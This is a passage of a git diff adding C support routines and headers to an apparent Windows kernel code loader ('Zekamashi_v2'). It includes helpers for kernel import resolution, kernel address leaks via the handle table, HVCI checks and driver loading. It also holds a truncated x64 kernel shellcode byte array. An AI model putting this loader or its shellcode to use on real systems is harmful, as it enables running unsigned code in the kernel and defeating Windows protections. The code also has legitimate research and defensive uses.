+ OBJECT_ATTRIBUTES attr;
+ UNICODE_STRING NtFileName;
+ IO_STATUS_BLOCK IoStatus;
+ LARGE_INTEGER Position;
+ ACCESS_MASK DesiredAccess;
+ PLARGE_INTEGER pPosition = NULL;
+ ULONG_PTR nBlocks, BlockIndex;
+ ULONG BlockSize, RemainingSize;
+ PBYTE ptr = (PBYTE)Buffer;
+ SIZE_T BytesWritten = 0;
+
+ if (Result)
+ *Result = STATUS_UNSUCCESSFUL;
+
+ if (RtlDosPathNameToNtPathName_U(lpFileName, &NtFileName, NULL, NULL) == FALSE) {
+ if (Result)
+ *Result = STATUS_INVALID_PARAMETER_1;
+ return 0;
+ }
+
+ DesiredAccess = FILE_WRITE_ACCESS | SYNCHRONIZE;
+ dwFlag = FILE_OVERWRITE_IF;
+
+ if (Append != FALSE) {
+ DesiredAccess |= FILE_READ_ACCESS;
+ dwFlag = FILE_OPEN_IF;
+ }
+
+ InitializeObjectAttributes(&attr, &NtFileName, OBJ_CASE_INSENSITIVE, 0, NULL);
+
+ __try {
+ Status = NtCreateFile(&hFile, DesiredAccess, &attr,
+ &IoStatus, NULL, FILE_ATTRIBUTE_NORMAL, 0, dwFlag,
+ FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE, NULL, 0);
+
+ if (!NT_SUCCESS(Status))
+ __leave;
+
+ pPosition = NULL;
+
+ if (Append != FALSE) {
+ Position.LowPart = FILE_WRITE_TO_END_OF_FILE;
+ Position.HighPart = -1;
+ pPosition = &Position;
+ }
+
+ if (Size < 0x80000000) {
+ BlockSize = (ULONG)Size;
+ Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, BlockSize, pPosition, NULL);
+ if (!NT_SUCCESS(Status))
+ __leave;
+
+ BytesWritten += IoStatus.Information;
+ }
+ else {
+ BlockSize = 0x7FFFFFFF;
+ nBlocks = (Size / BlockSize);
+ for (BlockIndex = 0; BlockIndex < nBlocks; BlockIndex++) {
+
+ Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, BlockSize, pPosition, NULL);
+ if (!NT_SUCCESS(Status))
+ __leave;
+
+ ptr += BlockSize;
+ BytesWritten += IoStatus.Information;
+ }
+ RemainingSize = (ULONG)(Size % BlockSize);
+ if (RemainingSize != 0) {
+ Status = NtWriteFile(hFile, 0, NULL, NULL, &IoStatus, ptr, RemainingSize, pPosition, NULL);
+ if (!NT_SUCCESS(Status))
+ __leave;
+ BytesWritten += IoStatus.Information;
+ }
+ }
+ }
+ __finally {
+ if (hFile != NULL) {
+ if (Flush != FALSE) NtFlushBuffersFile(hFile, &IoStatus);
+ NtClose(hFile);
+ }
+ RtlFreeUnicodeString(&NtFileName);
+ if (Result) *Result = Status;
+ }
+ return BytesWritten;
+}
+
+/*
+* supGetProcAddress
+*
+* Purpose:
+*
+* Get NtOskrnl procedure address.
+*
+*/
+ULONG_PTR supGetProcAddress(
+ _In_ ULONG_PTR KernelBase,
+ _In_ ULONG_PTR KernelImage,
+ _In_ LPCSTR FunctionName
+)
+{
+ ANSI_STRING cStr;
+ ULONG_PTR pfn = 0;
+
+ RtlInitString(&cStr, FunctionName);
+ if (!NT_SUCCESS(LdrGetProcedureAddress((PVOID)KernelImage, &cStr, 0, (PVOID*)&pfn)))
+ return 0;
+
+ return KernelBase + (pfn - KernelImage);
+}
+
+/*
+* supResolveKernelImport
+*
+* Purpose:
+*
+* Resolve import (ntoskrnl only).
+*
+*/
+void supResolveKernelImport(
+ _In_ ULONG_PTR Image,
+ _In_ ULONG_PTR KernelImage,
+ _In_ ULONG_PTR KernelBase
+)
+{
+ PIMAGE_OPTIONAL_HEADER popth;
+ ULONG_PTR ITableVA, * nextthunk;
+ PIMAGE_IMPORT_DESCRIPTOR ITable;
+ PIMAGE_THUNK_DATA pthunk;
+ PIMAGE_IMPORT_BY_NAME pname;
+ ULONG i;
+
+ popth = &RtlImageNtHeader((PVOID)Image)->OptionalHeader;
+
+ if (popth->NumberOfRvaAndSizes <= IMAGE_DIRECTORY_ENTRY_IMPORT)
+ return;
+
+ ITableVA = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
+ if (ITableVA == 0)
+ return;
+
+ ITable = (PIMAGE_IMPORT_DESCRIPTOR)(Image + ITableVA);
+
+ if (ITable->OriginalFirstThunk == 0)
+ pthunk = (PIMAGE_THUNK_DATA)(Image + ITable->FirstThunk);
+ else
+ pthunk = (PIMAGE_THUNK_DATA)(Image + ITable->OriginalFirstThunk);
+
+ for (i = 0; pthunk->u1.Function != 0; i++, pthunk++) {
+ nextthunk = (PULONG_PTR)(Image + ITable->FirstThunk);
+ if ((pthunk->u1.Ordinal & IMAGE_ORDINAL_FLAG) == 0) {
+ pname = (PIMAGE_IMPORT_BY_NAME)((PCHAR)Image + pthunk->u1.AddressOfData);
+ nextthunk[i] = supGetProcAddress(KernelBase, KernelImage, pname->Name);
+ }
+ else
+ nextthunk[i] = supGetProcAddress(KernelBase, KernelImage, (LPCSTR)(pthunk->u1.Ordinal & 0xffff));
+ }
+}
+
+/*
+* supDetectObjectCallback
+*
+* Purpose:
+*
+* Comparer callback routine used in objects enumeration.
+*
+*/
+NTSTATUS NTAPI supDetectObjectCallback(
+ _In_ POBJECT_DIRECTORY_INFORMATION Entry,
+ _In_ PVOID CallbackParam
+)
+{
+ POBJSCANPARAM Param = (POBJSCANPARAM)CallbackParam;
+
+ if (Entry == NULL) {
+ return STATUS_INVALID_PARAMETER_1;
+ }
+
+ if (CallbackParam == NULL) {
+ return STATUS_INVALID_PARAMETER_2;
+ }
+
+ if (Param->Buffer == NULL || Param->BufferSize == 0) {
+ return STATUS_MEMORY_NOT_ALLOCATED;
+ }
+
+ if (Entry->Name.Buffer) {
+ if (_strcmpi_w(Entry->Name.Buffer, Param->Buffer) == 0) {
+ return STATUS_SUCCESS;
+ }
+ }
+ return STATUS_UNSUCCESSFUL;
+}
+
+/*
+* supEnumSystemObjects
+*
+* Purpose:
+*
+* Lookup object by name in given directory.
+*
+*/
+NTSTATUS NTAPI supEnumSystemObjects(
+ _In_opt_ LPWSTR pwszRootDirectory,
+ _In_opt_ HANDLE hRootDirectory,
+ _In_ PENUMOBJECTSCALLBACK CallbackProc,
+ _In_opt_ PVOID CallbackParam
+)
+{
+ ULONG ctx, rlen;
+ HANDLE hDirectory = NULL;
+ NTSTATUS status;
+ NTSTATUS CallbackStatus;
+ OBJECT_ATTRIBUTES attr;
+ UNICODE_STRING sname;
+
+ POBJECT_DIRECTORY_INFORMATION objinf;
+
+ if (CallbackProc == NULL) {
+ return STATUS_INVALID_PARAMETER_4;
+ }
+
+ status = STATUS_UNSUCCESSFUL;
+
+ __try {
+
+ // We can use root directory.
+ if (pwszRootDirectory != NULL) {
+ RtlSecureZeroMemory(&sname, sizeof(sname));
+ RtlInitUnicodeString(&sname, pwszRootDirectory);
+ InitializeObjectAttributes(&attr, &sname, OBJ_CASE_INSENSITIVE, NULL, NULL);
+ status = NtOpenDirectoryObject(&hDirectory, DIRECTORY_QUERY, &attr);
+ if (!NT_SUCCESS(status)) {
+ return status;
+ }
+ }
+ else {
+ if (hRootDirectory == NULL) {
+ return STATUS_INVALID_PARAMETER_2;
+ }
+ hDirectory = hRootDirectory;
+ }
+
+ // Enumerate objects in directory.
+ ctx = 0;
+ do {
+
+ rlen = 0;
+ status = NtQueryDirectoryObject(hDirectory, NULL, 0, TRUE, FALSE, &ctx, &rlen);
+ if (status != STATUS_BUFFER_TOO_SMALL)
+ break;
+
+ objinf = (POBJECT_DIRECTORY_INFORMATION)supHeapAlloc(rlen);
+ if (objinf == NULL)
+ break;
+
+ status = NtQueryDirectoryObject(hDirectory, objinf, rlen, TRUE, FALSE, &ctx, &rlen);
+ if (!NT_SUCCESS(status)) {
+ supHeapFree(objinf);
+ break;
+ }
+
+ CallbackStatus = CallbackProc(objinf, CallbackParam);
+
+ supHeapFree(objinf);
+
+ if (NT_SUCCESS(CallbackStatus)) {
+ status = STATUS_SUCCESS;
+ break;
+ }
+
+ } while (TRUE);
+
+ if (hDirectory != NULL) {
+ NtClose(hDirectory);
+ }
+
+ }
+ __except (EXCEPTION_EXECUTE_HANDLER) {
+ status = STATUS_ACCESS_VIOLATION;
+ }
+
+ return status;
+}
+
+/*
+* supIsObjectExists
+*
+* Purpose:
+*
+* Return TRUE if the given object exists, FALSE otherwise.
+*
+*/
+BOOLEAN supIsObjectExists(
+ _In_ LPWSTR RootDirectory,
+ _In_ LPWSTR ObjectName
+)
+{
+ OBJSCANPARAM Param;
+
+ if (ObjectName == NULL) {
+ return FALSE;
+ }
+
+ Param.Buffer = ObjectName;
+ Param.BufferSize = (ULONG)_strlen(ObjectName);
+
+ return NT_SUCCESS(supEnumSystemObjects(RootDirectory, NULL, supDetectObjectCallback, &Param));
+}
+
+/*
+* supQueryObjectFromHandle
+*
+* Purpose:
+*
+* Return object kernel address from handle in current process handle table.
+*
+*/
+BOOL supQueryObjectFromHandle(
+ _In_ HANDLE hOject,
+ _Out_ ULONG_PTR* Address
+)
+{
+ BOOL bFound = FALSE;
+ ULONG i;
+ DWORD CurrentProcessId = GetCurrentProcessId();
+
+ PSYSTEM_HANDLE_INFORMATION_EX pHandles;
+
+ if (Address)
+ *Address = 0;
+ else
+ return FALSE;
+
+ pHandles = (PSYSTEM_HANDLE_INFORMATION_EX)supGetSystemInfo(SystemExtendedHandleInformation);
+ if (pHandles) {
+ for (i = 0; i < pHandles->NumberOfHandles; i++) {
+ if (pHandles->Handles[i].UniqueProcessId == CurrentProcessId) {
+ if (pHandles->Handles[i].HandleValue == (USHORT)(ULONG_PTR)hOject) {
+ *Address = (ULONG_PTR)pHandles->Handles[i].Object;
+ bFound = TRUE;
+ break;
+ }
+ }
+ }
+ supHeapFree(pHandles);
+ }
+ return bFound;
+}
+
+/*
+* supGetCommandLineOption
+*
+* Purpose:
+*
+* Parse command line options.
+*
+*/
+BOOL supGetCommandLineOption(
+ _In_ LPCTSTR OptionName,
+ _In_ BOOL IsParametric,
+ _Out_writes_opt_z_(ValueSize) LPTSTR OptionValue,
+ _In_ ULONG ValueSize
+)
+{
+ LPTSTR cmdline = GetCommandLine();
+ TCHAR Param[MAX_PATH + 1];
+ ULONG rlen;
+ int i = 0;
+
+ RtlSecureZeroMemory(Param, sizeof(Param));
+ while (GetCommandLineParam(cmdline, i, Param, MAX_PATH, &rlen))
+ {
+ if (rlen == 0)
+ break;
+
+ if (_strcmp(Param, OptionName) == 0)
+ {
+ if (IsParametric)
+ return GetCommandLineParam(cmdline, i + 1, OptionValue, ValueSize, &rlen);
+
+ return TRUE;
+ }
+ ++i;
+ }
+
+ return 0;
+}
+
+/*
+* supQueryHVCIState
+*
+* Purpose:
+*
+* Query HVCI/IUM state.
+*
+*/
+BOOLEAN supQueryHVCIState(
+ _Out_ PBOOLEAN pbHVCIEnabled,
+ _Out_ PBOOLEAN pbHVCIStrictMode,
+ _Out_ PBOOLEAN pbHVCIIUMEnabled
+)
+{
+ BOOLEAN hvciEnabled;
+ ULONG ReturnLength;
+ SYSTEM_CODEINTEGRITY_INFORMATION CodeIntegrity;
+
+ if (pbHVCIEnabled) *pbHVCIEnabled = FALSE;
+ if (pbHVCIStrictMode) *pbHVCIStrictMode = FALSE;
+ if (pbHVCIIUMEnabled) *pbHVCIIUMEnabled = FALSE;
+
+ CodeIntegrity.Length = sizeof(CodeIntegrity);
+ if (NT_SUCCESS(NtQuerySystemInformation(
+ SystemCodeIntegrityInformation,
+ &CodeIntegrity,
+ sizeof(CodeIntegrity),
+ &ReturnLength)))
+ {
+ hvciEnabled = ((CodeIntegrity.CodeIntegrityOptions & CODEINTEGRITY_OPTION_ENABLED) &&
+ (CodeIntegrity.CodeIntegrityOptions & CODEINTEGRITY_OPTION_HVCI_KMCI_ENABLED));
+
+ *pbHVCIEnabled = hvciEnabled;
+
+ *pbHVCIStrictMode = hvciEnabled &&
+ (CodeIntegrity.CodeIntegrityOptions & CODEINTEGRITY_OPTION_HVCI_KMCI_STRICTMODE_ENABLED);
+
+ *pbHVCIIUMEnabled = (CodeIntegrity.CodeIntegrityOptions & CODEINTEGRITY_OPTION_HVCI_IUM_ENABLED) > 0;
+
+ return TRUE;
+ }
+
+ return FALSE;
+}
+
+/*
+* supExpandEnvironmentStrings
+*
+* Purpose:
+*
+* Reimplemented ExpandEnvironmentStrings.
+*
+*/
+DWORD supExpandEnvironmentStrings(
+ _In_ LPCWSTR lpSrc,
+ _Out_writes_to_opt_(nSize, return) LPWSTR lpDst,
+ _In_ DWORD nSize
+)
+{
+ NTSTATUS Status;
+ SIZE_T SrcLength = 0, ReturnLength = 0, DstLength = (SIZE_T)nSize;
+
+ if (lpSrc) {
+ SrcLength = _strlen(lpSrc);
+ }
+
+ Status = RtlExpandEnvironmentStrings(
+ NULL,
+ (PWSTR)lpSrc,
+ SrcLength,
+ (PWSTR)lpDst,
+ DstLength,
+ &ReturnLength);
+
+ if ((NT_SUCCESS(Status)) || (Status == STATUS_BUFFER_TOO_SMALL)) {
+
+ if (ReturnLength <= MAXDWORD32)
+ return (DWORD)ReturnLength;
+
+ Status = STATUS_UNSUCCESSFUL;
+ }
+ RtlSetLastWin32Error(RtlNtStatusToDosError(Status));
+ return 0;
+}
+
+/*
+* supQueryMaximumUserModeAddress
+*
+* Purpose:
+*
+* Return maximum user mode address.
+*
+*/
+ULONG_PTR supQueryMaximumUserModeAddress()
+{
+ NTSTATUS ntStatus;
+
+ SYSTEM_BASIC_INFORMATION basicInfo;
+
+ ULONG returnLength = 0;
+ SYSTEM_INFO systemInfo;
+
+ RtlSecureZeroMemory(&basicInfo, sizeof(basicInfo));
+
+ ntStatus = NtQuerySystemInformation(SystemBasicInformation,
+ &basicInfo,
+ sizeof(basicInfo),
+ &returnLength);
+
+ if (NT_SUCCESS(ntStatus)) {
+ return basicInfo.MaximumUserModeAddress;
+ }
+ else {
+
+ RtlSecureZeroMemory(&systemInfo, sizeof(systemInfo));
+ GetSystemInfo(&systemInfo);
+ return (ULONG_PTR)systemInfo.lpMaximumApplicationAddress;
+ }
+
+}
+
+/*
+* supFindPattern
+*
+* Purpose:
+*
+* Lookup pattern in buffer.
+*
+*/
+PVOID supFindPattern(
+ _In_ CONST PBYTE Buffer,
+ _In_ SIZE_T BufferSize,
+ _In_ CONST PBYTE Pattern,
+ _In_ SIZE_T PatternSize
+)
+{
+ PBYTE p0 = Buffer, pnext;
+
+ if (PatternSize == 0)
+ return NULL;
+
+ if (BufferSize < PatternSize)
+ return NULL;
+
+ do {
+ pnext = (PBYTE)memchr(p0, Pattern[0], BufferSize);
+ if (pnext == NULL)
+ break;
+
+ BufferSize -= (ULONG_PTR)(pnext - p0);
+
+ if (BufferSize < PatternSize)
+ return NULL;
+
+ if (memcmp(pnext, Pattern, PatternSize) == 0)
+ return pnext;
+
+ p0 = pnext + 1;
+ --BufferSize;
+ } while (BufferSize > 0);
+
+ return NULL;
+}
+
+/*
+* supGetCurrentProcessToken
+*
+* Purpose:
+*
+* Return current process token value with TOKEN_QUERY access right.
+*
+*/
+HANDLE supGetCurrentProcessToken(
+ VOID)
+{
+ HANDLE hToken = NULL;
+
+ if (NT_SUCCESS(NtOpenProcessToken(
+ NtCurrentProcess(),
+ TOKEN_QUERY,
+ &hToken)))
+ {
+ return hToken;
+ }
+ return NULL;
+}
+
+/*
+* supUserIsFullAdmin
+*
+* Purpose:
+*
+* Tests if the current user is admin with full access token.
+*
+*/
+BOOL supUserIsFullAdmin(
+ VOID
+)
+{
+ BOOL bResult = FALSE;
+ HANDLE hToken = NULL;
+ NTSTATUS status;
+ DWORD i, Attributes;
+ ULONG ReturnLength = 0;
+
+ PTOKEN_GROUPS pTkGroups;
+
+ SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;
+ PSID AdministratorsGroup = NULL;
+
+ hToken = supGetCurrentProcessToken();
+ if (hToken == NULL)
+ return FALSE;
+
+ do {
+ if (!NT_SUCCESS(RtlAllocateAndInitializeSid(
+ &NtAuthority,
+ 2,
+ SECURITY_BUILTIN_DOMAIN_RID,
+ DOMAIN_ALIAS_RID_ADMINS,
+ 0, 0, 0, 0, 0, 0,
+ &AdministratorsGroup)))
+ {
+ break;
+ }
+
+ status = NtQueryInformationToken(hToken, TokenGroups, NULL, 0, &ReturnLength);
+ if (status != STATUS_BUFFER_TOO_SMALL)
+ break;
+
+ pTkGroups = (PTOKEN_GROUPS)supHeapAlloc((SIZE_T)ReturnLength);
+ if (pTkGroups == NULL)
+ break;
+
+ status = NtQueryInformationToken(hToken, TokenGroups, pTkGroups, ReturnLength, &ReturnLength);
+ if (NT_SUCCESS(status)) {
+ if (pTkGroups->GroupCount > 0)
+ for (i = 0; i < pTkGroups->GroupCount; i++) {
+ Attributes = pTkGroups->Groups[i].Attributes;
+ if (RtlEqualSid(AdministratorsGroup, pTkGroups->Groups[i].Sid))
+ if (
+ (Attributes & SE_GROUP_ENABLED) &&
+ (!(Attributes & SE_GROUP_USE_FOR_DENY_ONLY))
+ )
+ {
+ bResult = TRUE;
+ break;
+ }
+ }
+ }
+ supHeapFree(pTkGroups);
+
+ } while (FALSE);
+
+ if (AdministratorsGroup != NULL) {
+ RtlFreeSid(AdministratorsGroup);
+ }
+
+ NtClose(hToken);
+ return bResult;
+}
+
+/*
+* supQueryTokenUserSid
+*
+* Purpose:
+*
+* Return SID of given token.
+*
+* Use supHeapFree to free memory allocated for result.
+*
+*/
+PSID supQueryTokenUserSid(
+ _In_ HANDLE ProcessToken
+)
+{
+ PSID resultSid = NULL;
+ PTOKEN_USER ptu;
+ NTSTATUS status;
+ ULONG sidLength = 0, allocLength;
+
+ status = NtQueryInformationToken(
+ ProcessToken,
+ TokenUser,
+ NULL, 0, &sidLength);
+
+ if (status == STATUS_BUFFER_TOO_SMALL) {
+
+ ptu = (PTOKEN_USER)supHeapAlloc(sidLength);
+
+ if (ptu) {
+
+ status = NtQueryInformationToken(
+ ProcessToken,
+ TokenUser,
+ ptu,
+ sidLength,
+ &sidLength);
+
+ if (NT_SUCCESS(status)) {
+
+ allocLength = SECURITY_MAX_SID_SIZE;
+ if (sidLength > allocLength)
+ allocLength = sidLength;
+
+ resultSid = (PSID)supHeapAlloc(allocLength);
+ if (resultSid) {
+
+ status = RtlCopySid(
+ allocLength,
+ resultSid,
+ ptu->User.Sid);
+
+ }
+ }
+
+ supHeapFree(ptu);
+ }
+ }
+
+ return (NT_SUCCESS(status)) ? resultSid : NULL;
+}
+
+/*
+* supGetTokenInfo
+*
+* Purpose:
+*
+* Returns buffer with token information by given TokenInformationClass.
+*
+* Returned buffer must be freed with supHeapFree after usage.
+*
+*/
+PVOID supGetTokenInfo(
+ _In_ HANDLE TokenHandle,
+ _In_ TOKEN_INFORMATION_CLASS TokenInformationClass,
+ _Out_opt_ PULONG ReturnLength
+)
+{
+ PVOID Buffer = NULL;
+ ULONG returnLength = 0;
+
+ if (ReturnLength)
+ *ReturnLength = 0;
+
+ NtQueryInformationToken(TokenHandle,
+ TokenInformationClass,
+ NULL,
+ 0,
+ &returnLength);
+
+ Buffer = supHeapAlloc((SIZE_T)returnLength);
+ if (Buffer) {
+
+ if (NT_SUCCESS(NtQueryInformationToken(TokenHandle,
+ TokenInformationClass,
+ Buffer,
+ returnLength,
+ &returnLength)))
+ {
+ if (ReturnLength)
+ *ReturnLength = returnLength;
+ return Buffer;
+ }
+ else {
+ supHeapFree(Buffer);
+ return NULL;
+ }
+ }
+
+ return Buffer;
+}
diff --git a/Source/Zekamashi_v2/loader/sup.h b/Source/Zekamashi_v2/loader/sup.h
new file mode 100644
index 0000000..069a5b2
--- /dev/null
+++ b/Source/Zekamashi_v2/loader/sup.h
@@ -0,0 +1,133 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2014 - 2020
+*
+* TITLE: SUP.H
+*
+* VERSION: 2.00
+*
+* DATE: 24 Jan 2020
+*
+* Common header file for the program support routines.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+typedef NTSTATUS(NTAPI* PENUMOBJECTSCALLBACK)(POBJECT_DIRECTORY_INFORMATION Entry, PVOID CallbackParam);
+
+typedef struct _OBJSCANPARAM {
+ PWSTR Buffer;
+ ULONG BufferSize;
+} OBJSCANPARAM, * POBJSCANPARAM;
+
+BOOLEAN supIsObjectExists(
+ _In_ LPWSTR RootDirectory,
+ _In_ LPWSTR ObjectName);
+
+PVOID supHeapAlloc(
+ _In_ SIZE_T Size);
+
+BOOL supHeapFree(
+ _In_ PVOID Memory);
+
+BOOL supRegDeleteKeyRecursive(
+ _In_ HKEY hKeyRoot,
+ _In_ LPWSTR lpSubKey);
+
+NTSTATUS supLoadDriver(
+ _In_ LPCWSTR DriverName,
+ _In_ LPCWSTR DriverPath,
+ _In_ BOOLEAN UnloadPreviousInstance);
+
+NTSTATUS supUnloadDriver(
+ _In_ LPCWSTR DriverName,
+ _In_ BOOLEAN fRemove);
+
+NTSTATUS supOpenDriver(
+ _In_ LPCWSTR DriverName,
+ _Out_ PHANDLE DeviceHandle);
+
+NTSTATUS supEnablePrivilege(
+ _In_ DWORD Privilege,
+ _In_ BOOL Enable);
+
+VOID supPurgeSystemCache(
+ VOID);
+
+PVOID supGetSystemInfo(
+ _In_ SYSTEM_INFORMATION_CLASS InfoClass);
+
+BOOL supProcessExist(
+ _In_ LPWSTR lpProcessName);
+
+BOOL supGetCommandLineOption(
+ _In_ LPCTSTR OptionName,
+ _In_ BOOL IsParametric,
+ _Out_writes_opt_z_(ValueSize) LPTSTR OptionValue,
+ _In_ ULONG ValueSize);
+
+BOOLEAN supQueryHVCIState(
+ _Out_ PBOOLEAN pbHVCIEnabled,
+ _Out_ PBOOLEAN pbHVCIStrictMode,
+ _Out_ PBOOLEAN pbHVCIIUMEnabled);
+
+DWORD supExpandEnvironmentStrings(
+ _In_ LPCWSTR lpSrc,
+ _Out_writes_to_opt_(nSize, return) LPWSTR lpDst,
+ _In_ DWORD nSize);
+
+void supResolveKernelImport(
+ _In_ ULONG_PTR Image,
+ _In_ ULONG_PTR KernelImage,
+ _In_ ULONG_PTR KernelBase);
+
+ULONG_PTR supGetProcAddress(
+ _In_ ULONG_PTR KernelBase,
+ _In_ ULONG_PTR KernelImage,
+ _In_ LPCSTR FunctionName);
+
+SIZE_T supWriteBufferToFile(
+ _In_ PWSTR lpFileName,
+ _In_ PVOID Buffer,
+ _In_ SIZE_T Size,
+ _In_ BOOL Flush,
+ _In_ BOOL Append,
+ _Out_opt_ NTSTATUS* Result);
+
+PBYTE supQueryResourceData(
+ _In_ ULONG_PTR ResourceId,
+ _In_ PVOID DllHandle,
+ _In_ PULONG DataSize);
+
+ULONG_PTR supGetNtOsBase(
+ VOID);
+
+BOOL supQueryObjectFromHandle(
+ _In_ HANDLE hOject,
+ _Out_ ULONG_PTR* Address);
+
+ULONG_PTR supQueryMaximumUserModeAddress();
+
+PVOID supFindPattern(
+ _In_ CONST PBYTE Buffer,
+ _In_ SIZE_T BufferSize,
+ _In_ CONST PBYTE Pattern,
+ _In_ SIZE_T PatternSize);
+
+HANDLE supGetCurrentProcessToken(
+ VOID);
+
+BOOL supUserIsFullAdmin(
+ VOID);
+
+PSID supQueryTokenUserSid(
+ _In_ HANDLE ProcessToken);
+
+PVOID supGetTokenInfo(
+ _In_ HANDLE TokenHandle,
+ _In_ TOKEN_INFORMATION_CLASS TokenInformationClass,
+ _Out_opt_ PULONG ReturnLength);
diff --git a/Source/Zekamashi_v2/loader/tsmisc.h b/Source/Zekamashi_v2/loader/tsmisc.h
new file mode 100644
index 0000000..e0e0207
--- /dev/null
+++ b/Source/Zekamashi_v2/loader/tsmisc.h
@@ -0,0 +1,88 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2020
+*
+* TITLE: TSMISC.H
+*
+* VERSION: 1.00
+*
+* DATE: 24 Jan 2020
+*
+* Tsugumi as shellcode.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+#pragma once
+
+BYTE x64kernelcode[1055] = {
+ 0x40, 0x53, 0x48, 0x83, 0xEC, 0x20, 0x48, 0xB8, 0x1A, 0xC0, 0xED, 0x1C, 0xDE, 0xC0, 0x37, 0x13,
+ 0x48, 0x8B, 0xDA, 0x48, 0x89, 0x44, 0x24, 0x38, 0x48, 0x8D, 0x05, 0x51, 0x00, 0x00, 0x00, 0x48,
+ 0x89, 0x44, 0x24, 0x40, 0x48, 0x8B, 0x44, 0x24, 0x40, 0x48, 0x8B, 0x44, 0x24, 0x38, 0x83, 0x38,
+ 0x01, 0x74, 0x1A, 0x48, 0x8B, 0x44, 0x24, 0x38, 0x48, 0x8D, 0x0D, 0x61, 0x02, 0x00, 0x00, 0xC7,
+ 0x00, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x44, 0x24, 0x38, 0xFF, 0x50, 0x48, 0x48, 0x8B, 0x44,
+ 0x24, 0x38, 0x33, 0xD2, 0x48, 0x8B, 0xCB, 0xC7, 0x43, 0x30, 0x00, 0x00, 0x00, 0x00, 0xFF, 0x50,
+ 0x18, 0x33, 0xC0, 0x48, 0x83, 0xC4, 0x20, 0x5B, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
+ 0x48, 0x89, 0x5C, 0x24, 0x18, 0x55, 0x48, 0x8B, 0xEC, 0x48, 0x83, 0xEC, 0x60, 0x48, 0xB8, 0x1A,
+ 0xC0, 0xED, 0x1C, 0xDE, 0xC0, 0x37, 0x13, 0xC7, 0x45, 0xD0, 0x5C, 0x00, 0x44, 0x00, 0x48, 0x89,
+ 0x45, 0x10, 0x48, 0x8B, 0xD9, 0x33, 0xC0, 0xC7, 0x45, 0xD4, 0x6F, 0x00, 0x73, 0x00, 0x66, 0x89,
+ 0x45, 0xFC, 0x48, 0x8D, 0x0D, 0xF7, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x45, 0x10, 0xC7, 0x45, 0xD8,
+ 0x44, 0x00, 0x65, 0x00, 0xC7, 0x45, 0xDC, 0x76, 0x00, 0x69, 0x00, 0xC7, 0x45, 0xE0, 0x63, 0x00,
+ 0x65, 0x00, 0xC7, 0x45, 0xE4, 0x73, 0x00, 0x5C, 0x00, 0xC7, 0x45, 0xE8, 0x50, 0x00, 0x52, 0x00,
+ 0xC7, 0x45, 0xEC, 0x4F, 0x00, 0x43, 0x00, 0xC7, 0x45, 0xF0, 0x45, 0x00, 0x58, 0x00, 0xC7, 0x45,
+ 0xF4, 0x50, 0x00, 0x31, 0x00, 0xC7, 0x45, 0xF8, 0x35, 0x00, 0x32, 0x00, 0xFF, 0x50, 0x50, 0x48,
+ 0x8B, 0x45, 0x10, 0x48, 0x8D, 0x55, 0xD0, 0x48, 0x8D, 0x4D, 0xC0, 0xFF, 0x90, 0x80, 0x00, 0x00,
+ 0x00, 0x48, 0x8B, 0x45, 0x10, 0x48, 0x8D, 0x4D, 0xC0, 0xFF, 0x50, 0x30, 0x48, 0x8B, 0x45, 0x10,
+ 0x48, 0x8B, 0x4B, 0x08, 0xFF, 0x50, 0x28, 0x48, 0x8B, 0x45, 0x10, 0x48, 0xC7, 0x45, 0x18, 0x60,
+ 0x79, 0xFE, 0xFF, 0x83, 0x78, 0x04, 0x00, 0x74, 0x20, 0x0F, 0x1F, 0x80, 0x00, 0x00, 0x00, 0x00,
+ 0x48, 0x8B, 0x45, 0x10, 0x4C, 0x8D, 0x45, 0x18, 0x33, 0xD2, 0x33, 0xC9, 0xFF, 0x50, 0x38, 0x48,
+ 0x8B, 0x45, 0x10, 0x83, 0x78, 0x04, 0x00, 0x75, 0xE7, 0x48, 0x8B, 0x45, 0x10, 0x4C, 0x8D, 0x45,
+ 0x18, 0x33, 0xD2, 0x33, 0xC9, 0xFF, 0x50, 0x38, 0x48, 0x8B, 0x9C, 0x24, 0x80, 0x00, 0x00, 0x00,
+ 0x48, 0x83, 0xC4, 0x60, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
+ 0x48, 0x89, 0x5C, 0x24, 0x10, 0x48, 0x89, 0x74, 0x24, 0x18, 0x48, 0x89, 0x4C, 0x24, 0x08, 0x57,
+ 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x83, 0xEC, 0x40, 0x41, 0x8B, 0xF1, 0x49,
+ 0x8B, 0xF8, 0x4C, 0x8B, 0xEA, 0x4C, 0x8B, 0xF9, 0x45, 0x33, 0xF6, 0x4C, 0x89, 0x74, 0x24, 0x20,
+ 0x45, 0x33, 0xC9, 0x45, 0x33, 0xC0, 0x8B, 0xD6, 0x48, 0x8B, 0xCF, 0x41, 0xFF, 0x57, 0x10, 0x48,
+ 0x8B, 0xD8, 0x48, 0x89, 0x44, 0x24, 0x38, 0x48, 0x85, 0xC0, 0x75, 0x0A, 0xB8, 0x9A, 0x00, 0x00,
